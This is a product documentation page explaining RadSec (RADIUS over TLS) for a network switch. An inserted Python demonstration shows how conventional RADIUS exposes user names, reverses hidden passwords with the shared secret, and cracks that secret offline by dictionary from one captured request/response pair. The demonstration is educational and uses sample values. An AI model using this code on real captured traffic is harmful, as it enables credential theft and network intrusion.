Overview of RadSec

RADIUS uses UDP as its transport protocol. RadSec (RADIUS over TLS, RFC 6614) carries RADIUS over TCP inside a TLS session. Conventional RADIUS offers little confidentiality: an Access-Request is sent in clear text, so attributes such as User-Name and the client IP address are readable on the wire. Only the User-Password attribute is hidden, and the hiding is not strong encryption but an MD5-based XOR keyed by the shared secret and the Request Authenticator. An eavesdropper on the path can therefore read the request directly, and one who knows or guesses the shared secret can recover the password as well. Data protection matters most in roaming environments, where RADIUS packets travel across multiple administrative domains and untrusted networks.
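The following Python example is added here to make the weakness above concrete; it is not part of the original page or of any vendor's implementation. It implements the RFC 2865 User-Password hiding scheme, builds a constructed Access-Request and Access-Accept, and then shows what a passive observer on the UDP path learns: the user name in clear, the password once the shared secret is known, and the shared secret itself by an offline dictionary check against the Response Authenticator. The user name, password, shared secret, authenticator value and candidate list are all constructed sample values.

```python
import hashlib
import struct

# RFC 2865 codes and attribute types used in this example
ACCESS_REQUEST = 1
ACCESS_ACCEPT = 2
USER_NAME = 1
USER_PASSWORD = 2


def hide_password(password: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """RFC 2865 section 5.2 User-Password hiding.

    The password is NUL-padded to 16-byte blocks; each block is XORed with
    MD5(secret + previous ciphertext block), seeded with the Request
    Authenticator. This is obfuscation keyed only by the shared secret,
    not authenticated encryption."""
    padded = password + b"\x00" * ((16 - len(password) % 16) % 16)
    out, prev = b"", authenticator
    for i in range(0, len(padded), 16):
        keystream = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ k for p, k in zip(padded[i:i + 16], keystream))
        out += block
        prev = block
    return out


def reveal_password(hidden: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """Inverse of hide_password. Anyone holding the shared secret plus the
    captured packet (which carries the authenticator) can undo the hiding."""
    out, prev = b"", authenticator
    for i in range(0, len(hidden), 16):
        keystream = hashlib.md5(secret + prev).digest()
        out += bytes(c ^ k for c, k in zip(hidden[i:i + 16], keystream))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")  # strips padding; demo assumes no trailing NUL in the password


def build_access_request(username: bytes, password: bytes, secret: bytes,
                         authenticator: bytes, identifier: int = 1) -> bytes:
    """Minimal Access-Request: header, 16-byte Request Authenticator, two attributes."""
    hidden = hide_password(password, secret, authenticator)
    attrs = struct.pack("!BB", USER_NAME, 2 + len(username)) + username
    attrs += struct.pack("!BB", USER_PASSWORD, 2 + len(hidden)) + hidden
    header = struct.pack("!BBH", ACCESS_REQUEST, identifier, 20 + len(attrs))
    return header + authenticator + attrs


def build_access_accept(request: bytes, secret: bytes) -> bytes:
    """Access-Accept with no attributes. Per RFC 2865 section 3 the Response
    Authenticator is MD5(Code + ID + Length + RequestAuth + Attributes + Secret),
    which is what makes the secret guessable offline from a captured pair."""
    identifier = request[1]
    header = struct.pack("!BBH", ACCESS_ACCEPT, identifier, 20)
    response_auth = hashlib.md5(header + request[4:20] + b"" + secret).digest()
    return header + response_auth


def parse_attributes(packet: bytes) -> dict:
    """Walk the TLV attribute list that follows the 20-byte header."""
    attrs, pos = {}, 20
    while pos < len(packet):
        attr_type, attr_len = struct.unpack("!BB", packet[pos:pos + 2])
        attrs[attr_type] = packet[pos + 2:pos + attr_len]
        pos += attr_len
    return attrs


def eavesdrop(packet: bytes, known_secret: bytes = None) -> dict:
    """What a passive observer learns from one captured Access-Request."""
    attrs = parse_attributes(packet)
    result = {"username": attrs[USER_NAME].decode()}  # clear text on the wire
    if known_secret is not None:
        result["password"] = reveal_password(attrs[USER_PASSWORD], known_secret, packet[4:20])
    return result


def crack_secret(request: bytes, response: bytes, candidates) -> bytes:
    """Offline dictionary attack on the shared secret using a captured
    request/response pair; returns the matching candidate or None."""
    request_auth = request[4:20]
    for candidate in candidates:
        digest = hashlib.md5(response[:4] + request_auth + response[20:] + candidate).digest()
        if digest == response[4:20]:
            return candidate
    return None


if __name__ == "__main__":
    # Constructed sample values; a real client uses a random Request Authenticator.
    secret = b"testing123"
    authenticator = bytes(range(16))
    req = build_access_request(b"alice", b"Secret!Pass", secret, authenticator)
    resp = build_access_accept(req, secret)
    print("observer sees:", eavesdrop(req))
    print("with secret:  ", eavesdrop(req, secret))
    print("cracked secret:", crack_secret(req, resp, [b"wrong", b"password", b"testing123"]))
```

The point to take from the example is that the shared secret is the only thing standing between a captured packet and the user's credentials, and that the secret itself can be attacked offline from a single request/response pair. RadSec removes both exposures by wrapping the entire packet in TLS.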

RadSec mandates TLS to provide a secure, reliable and convenient transport for RADIUS requests over untrusted networks.

The RadSec module secures the communication between the switch and the RADIUS server over a TLS connection. Using RADIUS over TLS gives users the flexibility to host RADIUS servers across geographies and WAN networks.

To enable RADIUS over TLS, a new CLI option, tls, is provided under the radius-server command, where tls stands for Transport Layer Security.

Advantages of RADIUS over TLS (RadSec):
  • Secures the communication between the switch and the RADIUS server inside a TLS session (RFC 6614 assigns TCP port 2083), so the whole RADIUS packet, not just the User-Password attribute, is encrypted and integrity protected.

  • Provides the flexibility, with improved security, to host RADIUS servers across geographies and WAN networks.

  • Uses X.509 digital certificates to authenticate both the client and the server (mutual authentication), so each side verifies the other's identity during the TLS handshake instead of relying on the RADIUS shared secret; RFC 6614 fixes that secret to the string "radsec" because it no longer carries any security.